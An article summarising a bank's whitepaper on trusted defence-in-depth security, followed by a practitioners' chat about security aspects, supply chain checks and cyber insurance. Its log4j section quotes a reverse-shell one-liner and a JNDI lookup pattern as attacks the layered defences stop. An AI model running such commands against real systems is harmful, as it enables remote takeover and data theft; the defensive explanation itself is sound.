在 11 月 22 日的金融街论坛上，网商银行 CIO 高嵩正式发布《数字银行可信纵深防御白皮书》（以下简称《白皮书》），该白皮书是由网商银行与北京前沿金融监管科技研究院共同编写，首次提出了“可信纵深防御”的数字安全理念，并提供了详细实施路径。

可信纵深防御体系是一种新的安全防御体系架构，以密码学为基础、可信芯片为信任根、可信软件基为核心，对面向数字银行开放的应用服务，确保应用运行所依赖的资源、行为在启动时和运行中均是可信的。有别于传统基于攻击方法被动优化拦截和阻断策略的思路，可信纵深防御系统在面对 0Day、社会工程学、软硬件供应链等难以预测的高等级未知威胁时具有显著优势。一方面，其通过白名单化的管控策略，根据业务的代码、流量数据，清晰定义系统运行所依赖的预期内的可信行为，使得意外行为无法发生；另一方面，其可以针对硬件、固件、系统和应用等不同的防御平面部署多层次的防御体系，加大防御纵深，使攻击者无法达成攻击目的或在达成攻击目的之前就被发现和制止。

中国工程院院士沈昌祥认为，主动免疫可信计算的保障体系是合法合规应对数字银行面临的高级和未知威胁的最有效解决方案。网商银行可信纵深防御体系是数字银行场景下对主动免疫可信计算体系很好的落地实践，能够为金融业及其它行业主动免疫可信计算防御的有效应用带来借鉴及示范。

以下是白皮书核心内容摘要，白皮书全文下载方式附在文章末尾，落地实践讨论实录在白皮书摘要之后。

01 数字化转型过程中，银行面临的安全挑战

图1 银行业数字化转型面临的安全挑战

《白皮书》指出，数字化转型是当下金融行业的主要趋势和发展方向。在银行业，数字化转型意味着：金融服务线上化、服务场景与形态多样化、开放互通幅度加大、数据密集度增加、效率与体验得到升级。然而不可忽视的是，数字化在带来效率显著提升的同时，也必然带来信息安全方面的挑战，主要包含以下三个方面：

a) 风险敞口与影响面扩大，安全事件概率增加。金融服务线上化、场景化、复杂化导致银行信息系统对外暴露的攻击面必然大幅度增加，将会有越来越多的漏洞被黑客发现和利用，攻击成功的概率也将会提升。

b) 安全威胁等级将会提升。由于金融业务和资金有关，越来越多的金融服务数字化以后，攻击成功的潜在收益会增加。攻击者也更愿意投入更大的攻击成本，所以数字化转型中面临的安全威胁等级提高。

c) 安全与效率的矛盾将会更加突出。数字化转型带来了金融机构服务形态和技术形态的变化，原本依靠网络隔离技术和管理制度约束的机制不一定能继续适应，很可能无法满足业务发展的效率诉求和服务体验需求。因此，如何在应对高等级安全威胁的同时还能兼顾效率和服务体验，也是金融业务数字化转型中一个不可忽视的挑战。

图 2 数字化银行未来面临的关键安全威胁

《白皮书》指出系统性来看，在数字化转型过程中，银行业主要面临0Day漏洞攻击、社会工程学攻击、供应链安全威胁、业务滥用风险四个方面的高等级安全威胁。

图 3 业界新思路分析

安全业界提出了一些新的思路与探索，包括可信计算、安全平行切面以及零信任。

a) 首先是沈昌祥院士提出的可信计算 3.0 的理念。通过主动免疫的方法防御不可预测、不可控的攻击与威胁，并且基于不可篡改的硬件芯片作为可信根主动逐层检查系统的行为是否可信，建立理论可证完备的信任链。

b) 二是安全平行切面技术。在业务系统中构建安全防御的平行空间，实现与业务解耦、透视、智能评估、精准管控，兼顾业务效率的同时，高效构建安全纵深防御体系。

c) 三是零信任防御理念。从不信任，始终验证；不信任网络位置；最小化访问权限；记录和监控所有网络访问流量。

02 可信纵深防御技术体系

图 4 可信纵深防御理念

可信纵深防御，是一种新的安全防御体系架构。通过可信和纵深两个理念的结合，实现对风险的主动免疫，多层覆盖、完备信任，能够有效应对数字化营运中面临的各种风险，为业务发展保驾护航。

可信纵深防御，可以做到只允许预期内的行为可以执行，即主动免疫。并且，通过将可信防御通过多层部署，形成纵深，大幅降低风险事件发生的概率。与此同时，它建立了完备的信任链，将信任关系逐级规约至硬件芯片可信根，保障防御体系自身的安全。

可信纵深防御，能有效识别“自己”和“非己”成分，破坏与排斥进入信息系统机体的有害“行为”，为信息系统加持“免疫能力”，有效应对 0Day 攻击、社会工程学攻击、供应链攻击等高级和未知威胁。

图 5 可信纵深防御总体框架

可信纵深防御体系整体架构有四个核心部分：硬件芯片可信根、可信策略控制点、信任链和可信管控中心。这四部分的安全防护部件形成可信防护体系，这一体系与计算体系形成双体系结构。其中可信管控中心又由可信策略管控系统、可信策略刻画系统、安全保障系统、稳定性保障系统四部分组成。

1) 基于硬件可信芯片构建信任根

基于硬件可信芯片和密码学方法对物理机的启动参数和启动程序进行可信管控，同时提供静态的和动态的信任链的校验机制，确保硬件芯片、启动参数、系统 OS 等均是安全可信的。同时基于硬件可信芯片构建信任链以将信任关系从基础设施层逐层传递至应用层和网络层，最终形成完备的信任链，以支持对数字银行信息系统和数字资产的可信管控和管控。

2) 基于安全切面构建可信策略控制点

基于数字银行 IT 架构分析、选型或者设计可信策略控制点，实现对于风险场景的数据内视和可信管控。在可信策略控制点的部署上，充分利用安全平行切面提供的原生安全控制点能力，以实现安全管控与业务应用的既融合又解耦，即安全能够深入业务逻辑，不再是外挂式安全；业务上线即带有默认安全能力，并实现跨维的检测、响应与防护；同时安全能力可编程、可扩展，与业务各自独立演进。

数字银行可信纵深防御体系架构如图 5 所示，针对开放的应用系统服务，在访问链路上，通过在移动端及终端层、网络层、应用层及基础设施层建立不同层面的可信策略控制点，并配置符合可信防御强度要求的安全防御策略。

在移动端及终端层，以移动端安全切面或 SDK 及终端检测与响应 EDR 能力作为可信策略控制点，针对用户的日常操作行为及员工的办公行为，对使用的小程序、软件、进程、网络等建立精细化的可信管控能力，做到仅允许预期内的小程序、软件、进程、网络行为是可以加载和执行的，以有效抵御恶意软件的加载和运行及木马、病毒的回连等行为。

在网络层，以统一访问代理网关流量切面为可信策略控制点，建立针对访问主体身份、权限、环境、行为的可信管控策略，确保访问主体仅能通过预期内的身份、权限，在安全的环境下，按照预期内的行为进行应用系统的使用，异常的身份冒用、越权操作、不可信的环境及网络攻击行为将直接被拦截或者上报安全事件。

在应用层，以应用切面（含 RASP）及安全容器系统切面为可信策略控制点，对容器、应用调用的类、方法、函数、文件和网络行为建立白名单的可信管控策略，确保容器和应用仅能按照预期内的方式启动或运行。

在基础设施层，基于硬件可信芯片信任根，对物理机节点的启动和运行进行可信管控，确保使用的物理机是可信的。如上所述，通过各个层面建立的可信策略控制点，配置可信管控策略，建立覆盖数字银行信息系统和数据资产全链路的可信纵深防御体系，有效应对数字银行面临的高级和未知威胁。

3) 基于信任链保障可信防御产品或能力的安全可信

可信策略控制点是数字银行实施可信管控依赖的关键能力，如何保障可信策略控制点的安全性至关重要。如果实施可信管控依赖的能力自身是不安全的，对于业务信息系统的可信管控将无法保障，同时这些能力本身也可能会引入新的安全风险。因此，在可信策略控制点的建设中需要充分利用硬件可信芯片提供的可信存储和密码技术，构建完备的信任链，将整个信任机制由硬件可信芯片逐层传递至基础设施层、应用层和网络层等各个层面的可信策略控制点，保障可信策略控制点的安全性，为数字银行业务的信息系统和数字资产的可信管控提供基础能力支撑。

4) 基于可信管控中心实施可信管控

可信管控中心是可信纵深防御体系的大脑中枢，负责可信策略的生成、配置下发、事件上报和行为审计等工作，同时为整个可信纵深防御体系的运行提供安全性和稳定性的保障能力。可信管控中心由可信策略管控、可信策略刻画、安全保障、稳定性保障等系统或模块组成。

综上所述，可信纵深防御体系整体架构以硬件可信芯片为信任根，以可信策略控制点为可信软件基，基于基础设施层、应用层、网络层及移动端和终端层各层面建立的可信策略控制点，进行多层纵深可信防护策略的设计并落地，覆盖业务应用、信息系统和服务全链路，形成完备的可信纵深防御体系，有效应对数字银行面临的高级和未知威胁。

03 可信纵深防御的应用及技术演进

图 6 log4j 风险案例分析

《白皮书》以 log4j 0Day 漏洞应对为例介绍了可信纵深防御体系的应用：2021 年 11 月爆发的 log4j 0Day 漏洞，几乎影响全球所有企业。实际上这个漏洞是 2013 年 9 月就存在了，意味着黑客可能在 8 年前就能利用此漏洞进行攻击，而直到 2021 年这个漏洞才公开和修复。而公开之前，这个漏洞到底造成了多少损失，则无法估计。

图 7 log4j 漏洞攻击链路

攻击链路分析：

以 log4j 漏洞的利用和防护为例：首先，攻击者会通过使用通过精心构造的攻击脚本针对数字银行开放至互联网的漏洞应用发起恶意攻击请求。然后，攻击脚本到达应用层，应用代码调用 lookups 日志函数进行日志打印，触发漏洞利用点，恶意脚本通过该功能点可以执行系统命令。接下来，通过获取的应用权限进一步在应用容器当中反弹后门回连至攻击者远控服务器，达到长期控制应用及服务器的目的。最终，通过获取的后门权限窃取数字银行数据资产。

防护方案说明：

以如上 log4j 的漏洞利用链路为例介绍可信纵深防御体系对于该漏洞的关键应对方案。首先，当攻击者发起攻击的时候建立的网络层的可信能力会对请求的参数进行校验，如果参数仅包含 0-9a-zA-Z 之间的字符，则在网络层针对存在特殊字符的请求将会默认拦截。然后，如果请求到达了应用层，针对应用运行时可以加载的类、函数、方法、网络、文件等行为均会进行严格的白名单控制，针对 {jdni:rmi|ldap|…} 等服务将无法调用成功。进一步，请求到达了容器层，容器应用可信的能力将会严格限制容器当中的进程行为，非预期内 bash -i >& /dev/tcp/ip/port 0>&1 的反弹 shell 的行为将无法执行成功。最终在网络层，对于无外联需求的应用，将无法出网；对于有外联需求的应用也严格限制了外联的域名和参数等，从而有效地控制了攻击者外联远控服务器。通过构建多层可信级的防御措施最终达成了 0Day 漏洞防御的效果。

04 结语

随着数字经济的不断发展，数字银行的信息安全防护体系的价值愈加重要，而基础安全防御体系是保障银行业客户信息和资金安全的基础底座，也是保证银行持续稳健经营的安全基石。作为一家完全线上化运营的原生数字银行，网商银行对于可信纵深防御体系的探索，为未来信息安全防护体系的演进方向提供了一个范例。

编制工作组希望通过白皮书的方式将网商银行可信纵深防御的最佳实践共享给金融同业，为已经开展数字化转型或准备转型的同业机构，提供网络安全体系建设升级的参考案例。后续网商银行还会持续将可信纵深防御体系的成果与实践分享给整个银行业，和整个业界一同构建更完善的可信纵深防御生态，保障银行业数字化转型的安全平稳进行。

群友讨论实录

Q：恭喜大作出炉，白皮书给人前进的信心和勇气。可以请教两个小问题么？“（应用镜像）即使绕过了检测发布至生产环境，应用运行时可信能力会针对应用运行的函数、网络行为和文件行为进行可信管控，确保应用运行状态是可信的“，我们最近在根据skywalking的数据做调用链分析，为了能发现并记录（我们远做不到阻断或干预）偶发操作，我们要分析长时间（计划半年以上）的调用关系，数据量很大，应用运行时的节点和关系非常多。

第一个问题，怎么建立应用运行时可信的模型和规则？

第二，我们用neo4j做分析碰到性能问题和展示效果问题，打退堂鼓回到ES+自定义前端，您建议3-5人的小生产线建设团队去做图计算么？

A1：第一个问题，在3.3.6小节介绍了可信策略制定的总体方法和思路。具体到应用运行时的行为可信策略来说，刻画应用内部运行时的程序执行路径和调用的全链路的确非常复杂，可以按优先级分阶段实施落地，并不一定要一步到位做到所有路径和调用链的可信，持续迭代升级。可优先做的是所有可能涉及到系统调用（文件读写、命令和代码加载执行、网络访问等）的类、方法参数的行为刻画。工程上的是实现是基于安全切面实现的行为数据采集和控制，策略基于行为数据生成。

第二个问题，关于人力投入方面，在应用运行时可信策略的持续迭代升级方面我们持续投入了1-2个同学。还是上面说的需要分步骤和优先级，优先刻画关键环节的可信行为和链路。

A2：学习的收获还是超过预期，大厂慷慨讲出了他们的深度积累。一些感受，可观测性或监测、数据分析很热闹，我们有时候也很满足，但看了网商实践，其实观测、分析不是目标，而且这部分可能慢慢没有门槛了。终极目标是：opratability，在底层支持下，以应用、业务为中心，能够快速自动发现问题、定位问题，修复系统，或者不修复系统但能控制行为。没有类似安全平行切面的加持，这个领域估计还挺难的。还有一个，就是分步骤一步步做。

一般闭环，管理闭环比较容易（忽悠），技术上要实现监控、分析、反馈控制，软件比硬件或自动控制要难。

我原来想当然觉得安全平行切面只适用java类，现在要认真重修一遍了。JAVA应用的安全切面是最早切入的，因为应用面广，所以从投入产出效率来说是优先做的。随着对抗的深入，发现也需要做其他层面的。

A3：安全切面的思想非常好，但是在企业落地的时候，对研发工程化水平、安全团队工程署水平要求都非常高；而且如果是自研为主都还好说，如果是外购产品占比大的话，实现安全切面就很难。我觉得后续可以琢磨一个安全切面的实现框架，或者是在OS之上的技术栈研究一个普适的安全切面实现框架、标准。

A4：蚂蚁准备开源安全切面，可以合作。

A5：腾讯数字化瞄准的是实业，尤其是交通（道路、车、导航、自动驾驶）的数字孪生讲的很精彩。但是数字化、数字孪生和我们做网络安全的什么关系呢？我想网络安全是IT产业数字孪生的一种方便技法，同时IT数字化了可能会颠覆一些安全产品，甚至像可信计算、安全平行切面那样会改变软件工程的走向。

中，一般能接受数字化对网络安全有很大改进，但是数字化衍生场景，即宏观、微观、行为分析，对业务、管理、产业、软工、敏捷、精益有什么影响，还需要讲好故事，讲清楚价值。阿里、网商的安全平行切面、可信安全，我的感受是他们通过自己的产品，超越了简单的数字孪生，直接实现了业技融合，场景直观，价值显而易见。

腾讯2022数字生态大会数字孪生专场回看地址：

https://2022gdes.cloud.tencent.com/eventShows/527377566403661824#1

Q：大部分内容都能看懂，咨询两个实践问题：

一是BIOS可信，这个具体怎么落地的？有商业或开源方案？

二是供应链制成品可信，这个具体要怎么做啊？

A6：刚看到，感谢群友提的具体问题。

第一个问题指的是在服务器上电启动过程中需要检验BIOS的固件有没有被篡改、被植入了后门等，实现方式是通过可信根芯片做的。在没有可信芯片作为可信根的情况下，可能只能将最初启动的代码段作为信任起点。开源应该有一些安全启动相关的时间，但不一定完备成熟。商业产品群里说可能不合群规，可以单聊。

第二个问题，对于供应链的软件包、基础软件会先做安全评估，在打包和打镜像环节会卡点准入，只允许评估过的被运行。

A7：这种安全架构设计看起来和信创ZYJ设计类似。BIOS启动前的安全检测，设备指纹或kernel关键文件以及第三方验证芯片。

A8：和安全启动原理有类似性。总体思路上还是控制只能运行符合预期的代码和符合预期的行为。

Q：再请教个问题哈，有一些可信实践，主要是埋点采集，安全监测，响应控制，安全要做，对业务的影响也可控，阻力可控。比如可信根这一块，推的范围有多广，是完全基于安全目标推的吗？实验环境上一个应用见得多，真上真用见得少，是怎么解决底座更换问题的？

A9：确实是个好问题，可信根芯片涉及到服务器更新换代的问题，直接汰换成本太高了，确实迭代周期比较长。我们的策略是新采购的机器默认覆盖，老机器过保后汰换，19年开始覆盖到现在规模已经比较大了，所有应用的这3年扩容的新机器都带的。

Q：对于jav、python类基于vm或者解释器的应用，进程级签名可信感觉还需要vm代码校验支持？可能还要联动发布平台？

A10：这个问题在实际应用层攻防中很关键，也是之前可信计算总是被大家觉得和实际攻防脱节的关键点。解释类程序是把数据变成了代码执行，其实经过实际攻防检验的方案演进，我们已经不仅仅要做代码完整性的静态签名验证。而需要静态和动态都做，一个是运维发布和运行启动时的卡点验证，二是基于应用安全切面在运行时去控制关键路径的代码运行行为，JAVA/Python/Node都可以有切面支持。

A11：是的，我觉得这个比进程级可信要复杂，比如jvm启动一个jar，或者动态加载一个jar，需要去校验这个jar或者里面class的签名。

A12：嗯嗯，jvm加载一个jar包并运行起来，这是个场景，只做代码完整性的签名校验仍然不够，因为jar中可能仍然有漏洞和后门可以被利用，甚至合法的类里面有可以被攻击利用的方法。所以，还需要在运行时检验具体运行的类、方法、参数、关键调用链路是不是业务正常运行预期之内的。

A13：那这个跟rasp又有些结合了，或者说rasp也可以统一在里面。

A14：rasp是切面体系中的一个应用。围绕切面底，其实已经有了血缘溯源ras，国密改造十几个应用。

Q：能不能介绍下切面底座是什么？非自研应用能搞这个吗？会不会应用面很窄？

A15：你先看下有哪些应用再说窄不窄：

学习资料有：

http://www.itstec.org.cn/aspect_oriented_security_white_paper.pdf

A16：自研不自研倒不关键，自研的也不是自己造轮子，也有组件引入。关键是否可控，能不能动，插桩埋点。如果买来的东西本身是个黑盒子，肯定不行。

A17：非自研也可以的，切面就是要解决和业务研发耦合的问题。

Q：我们不是业务研发，是业务外购。或者说买个金蝶，能不能切它？主要是切它，金蝶厂商会不会说你动了它兼容性，然后出事他就不负责。

A18：按我读书的理解，比如有7层可信，黑盒占其中3层，这里面就切不开，但其它4层就可以。

A19：金蝶也不对你被黑了负责啊。切面标准化以后会做切面原生协同，一起协同解决生态共建问题。切面其实解决的是普适性运维管控问题，比安全的范围大很多。APM其实是一个典型应用，另外稳定性风险领域的混沌工也是。

A20：和外购公司的研发解耦合。只要运行JVM、操作系统等是标准的，其实应该可以支持，具体的控制策略需要自己叮嘱。

Q：开源确实让人想到在建生态，不过我没看清这是要建什么生态？

A21：切面基座和应用的生态，可以对比云原生k8s与sidecar。

A22：这个不可对比，SIDECAR和K8S是一个生态，而且sidecar是基于k8s技术体系长出来的，而切面基座和应用完全就是N套体系出来，互不相干。就像把SIDECAR扔到WINDOWS怎么用？

A23：这个就是我觉得有点难实现的地方，比如买个OFFICE，微软的研发会告知小甲方用啥JVM，什么版本吗？另外他们自身的都没有这个切面，所以他们做开发和兼容性测试根本就不会考虑这个东东，想怎么搞就怎么搞，一个升级包过来，可能就冲突了，被底座限制了，那么就出事了。这个和现在零信任在大部分企业只能替代VPN一样，没法做内网应用细颗粒度的限制。

A24：可信纵深可以利用切面做模块验证、行为画像、监控和管控，和具体的云没啥关系。

Q：那么有没有管控常规外购软件的落地实践可以分享一下？比如WPS，360浏览器，金蝶，用友这些。

A25：我们app里的第三方sdk的隐私合规都是靠切面管控的。windows上的应用也是用系统切面管控安全的。其实切面管控第三方恰恰是强项，你把盲管控与稳定性要求强行绑在一起了。闭着眼睛，咋样都会出问题的。

Q：这个能再展开说说为什么是强项吗？

A26：核心是做好监控管控的职责策略边界以及底座的隔离、调度能力，而不是把自己当成上帝为所欲为。我们正好有约稿在写，切面的平行仓架构，这方面做了展开介绍，剧透一下：

另外切面做的工作不是当成一个随意接sdk的地方，是要有严格约束管控的。当换来的收益是直接在应用内部的监控能力，以及对异常事件的干预能力。这个比sidecar强很多，但也不能像sidecar那样随意。

Q：因为普通企业连梳理访问关系，端口和访问权限都很难，导致内部零信任推不下去，所以听到要控制到类我就觉得很难搞了。

A27：切面梳理这个关系恰恰很在行。

A28：我们先不说“切面”，把它简称A。在没有A的时候，rasp，隐私插桩，微隔离，大家为了解决各种问题，依然要深入黑盒应用去做点事情。A只是提供了统一框架、方法论、底座，让所有环节可联动，也减少重复建设。这是我的理解。

A29：是，否则各家打架打破头。

A30：感觉安全切面在自研和云原生为主的互联网业态下更容易实现，而在大多数包罗了外包、外采、自研、且各种为了解决自身业务问题的技术方案混杂模式下的传统企业难点比较大，得要靠蚂蚁等大企业把真正的大切面生态构建起来的话估计就前途一片光明了。

A31：我也是这个观点，在传统企业上的也不多，因为目前前提都是无法深入黑盒应用。

A32：类似支付宝这种app，约等于一个小型的开放webos。有 n 多业务方写不同的业务代码、有各种三方 sdk、有 uc 内核在里面，还有数以万计的外部开发者写的小程序代码/h5页面。

切面在这个开放 webos 的隐私合规、数据流转、流量管理、用户行为、漏洞攻击等方面都发挥了很大的作用。它是一种数字化透视和精细化管控的技术方案，在这个上面可以按需构建很多产品能力。

A33：这种思路就跟aws一样，你先长在我身上，然后我把能力开放出来，你我深度融合，大企业底座带动长在身上的伙伴一起发展。

A34：我对生态并不看好，各个公司连日志都想搞自己的生态。但是这个构想我觉得是前瞻的、落地的、有益的，问题只在于多大范围。

A35：这个太难了，所以大家基本都在等我们慢慢做。这个的确很难，我们第一要求是做得稳，所以也不会太快推的很广，一步步做扎实。

Q：做生态的关键因素之一就是利他，如果不考虑这个因素必定很难做起来，安全平切面生态的利他点这方面有一些考虑嘛？

A36：利他不是嘴上说，是生态中各个角色共同去努力的，这个在国内是最难的。很多甲方白嫖成了习惯，另外就是乙方动不动就想做个大一统通吃。需要志同道合的伙伴一起努力。

A37：是的，每个企业的关键痛点往往不一样，很难达成利益诉求的一致性，反而那些由于某个国家法律或者政策的要求才有可能催化出来各家企业的公约数，这种公约数上去，发展生态或许成功率会大一点。

A38：之前应该是金将军分享行业洞察的时候，提过一个点，以色列那边公司很喜欢做小而美，一个公司只做一个点，把接口、解耦做得足够好，他就是一个能力。

国内很多公司，即使一开始是独角兽，后来也会为了股东等的压力走上全家桶的老牌路子，我不懂为什么。

A39：关键还是实战压力不足，市场没有真正起来。另外白嫖成了习惯，可以说是乙方惯出来的。

A40：如果拿美国做对比，那么我们会发现美国有很严格的披露制度，而国内没有；美国讲究过程安全，而国内考核结果。

A41:美国网络安全保险行业也很不成，也在初，但市场已经到了100多亿美金了，我国去年还不到1亿人民币。当然美国连续三年网络安全保险费率增长翻番，也是被网络勒索团伙逼的。

A42：从无到有，固然是进步。我觉得保险不解决国内的问题，相反有竞争。如果保费便宜了，那我大概搞搞就行了，也不用做深了。对于要求高的，保险更不解决他们的问题。比如，我觉得切面不会在保险要求中。

A43：不是的，保险是牵引力，迫使风险投入前置，终极目标走向网络安全强制保险，最终是保费+安全投入达到一个平衡。比如部署了某标准的切面，保费费率可以降下来。

A44：如果是交强险，我觉得抓手效果会比等保更好。

A45：这个是行业实战最后达成的一个平衡。核心是保险把前置投入、后果代价、国家监控调、能很好的链接反馈循环起来。最后是把实战效果和经济循环挂钩，这个对于网络安全行业发展来说，是一个走出合规驱动局限的重要方向。也能回答老板的灵魂拷问：不出事，要你有什么用？（降保费啊）出了事，要你有什么用？（和保险一起响应和要保费啊）

A46：现在国内保险很多是与安全产品厂商耦合，把部署某些安全产品或者能力作为投保准入条件。

A47：保险公司的量化水平我还是相信的。

A48：现在保险公司很晕，还在量化积累数据中。过个三五年，像美国市场被大规模实战毒打过，才能慢慢成熟起来。

A49：现在靠自发买保险，好像市场也不大，搜了下全球市场规模才100亿美元，搜美国网安保险市场规模是75亿美元。国内我不敢想。

A50：初期互相带，保险公司和甲方都认可就行。长期要逐渐标准化起来。国内今年增长很快，突破亿元人民币门槛了。

A51：我想表达的是，被打了的，和买了保险的，可能是两拨。买保险，其实重视和投入都有一定量级了，而被打的，我看案例都是空买设备没运营的。

A53：国外有大致三分之一的国家是强制保险，另外的大部分是强烈推荐，另外一些大公司，要有商业合作的前提是你也要买网络安全保险。统计样本不大，小样本经验数据哈。整体上行业还是初期，相当不成熟，但这个对网络安全市场的推动是实质性的。

A54：原来还有商业合作的抓手，让我想起了美禁俄卖天然气，抓手居然是海运保险，有本事自己保就不受限，有点意外，又合情合理。

点击阅读原文，下载《数字银行可信纵深防御白皮书》。

-------------------------------------